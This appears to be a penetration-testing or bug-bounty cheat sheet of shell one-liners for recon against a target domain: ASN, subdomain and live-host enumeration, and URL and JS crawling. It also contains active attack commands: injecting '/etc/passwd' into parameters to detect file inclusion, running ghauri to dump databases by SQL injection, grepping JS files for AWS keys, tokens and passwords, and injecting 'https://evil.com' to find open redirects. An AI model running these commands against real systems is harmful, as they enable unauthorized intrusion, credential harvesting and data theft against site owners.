Recon

echo AS12345 | asnmap -silent | naabu -silent

echo AS12345 | asnmap -silent | naabu -silent -nmap-cli 'nmap -sV'

amass intel -asn <ASN_Number> -o asn_ips.txt

bbot -t $domain -p subdomain-enum

cat -p ~/.bbot/scans/$name/subdomains.txt | anew domain-subs-final

curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew domain-subs-final

subfinder -dL domains -all -stats -nW -oI -o domain-subfinder-out

cat domain-subfinder-out | awk -F ',' '{print $1}' > subfinder-subs-only

cat subfinder-subs-only | anew domain-subs-final

shosubgo -d $domain -s $SHODAN_API_KEY -o shosubgo-subs-out

cat -p shosubgo-subs-out | anew domain-subs-final

cat domain-subs-final | dnsgen - | puredns resolve --resolvers resolvers.txt

cat domain-subs-final | alterx | dnsx -resp -silent -r resolvers.txt -o subdomains-resolved.txt

httpx -l resolved-subdomains.txt -status-code -title -content-length -web-server -asn -location -no-color -follow-redirects -t 15 -ports 80,8080,443,8443,4443,8888 -no-fallback -probe-all-ips -random-agent -o live-websites -oa

cat live-websites | grep -i "login\|admin" | tee login_endpoints.txt

waymore -i $domain -mode B -oU ./waymoreUrls.txt -oR ./waymoreResponses --notify-discord

cat live-websites | waymore -mode B -oU ./waymoreUrls.txt -oR ./waymoreResponses --notify-discord

katana -l live-websites -silent -jc -jsl -o katana_results.txt 

xnLinkFinder -i ~/.config/waymore/results/$domain -sp https://$domain -sf $domain -o js_files.txt

cat js_files.txt | gf aws-keys | tee aws_keys.txt
cat js_files.txt | gf urls | tee sensitive_urls.txt

cat live-websites | gf csrf | tee csrf_endpoints.txt

cat live-websites | gf lfi | qsreplace "/etc/passwd" | xargs -I@ curl -s @ | grep "root:x:" > lfi_results.txt

ghauri -u "https://target.com?id=1" --dbs --batch

cat js_files.txt | grep -Ei "key|token|auth|password" > sensitive_data.txt

cat urls.txt | grep "=http" | qsreplace "https://evil.com" | xargs -I@ curl -I -s @ | grep "evil.com"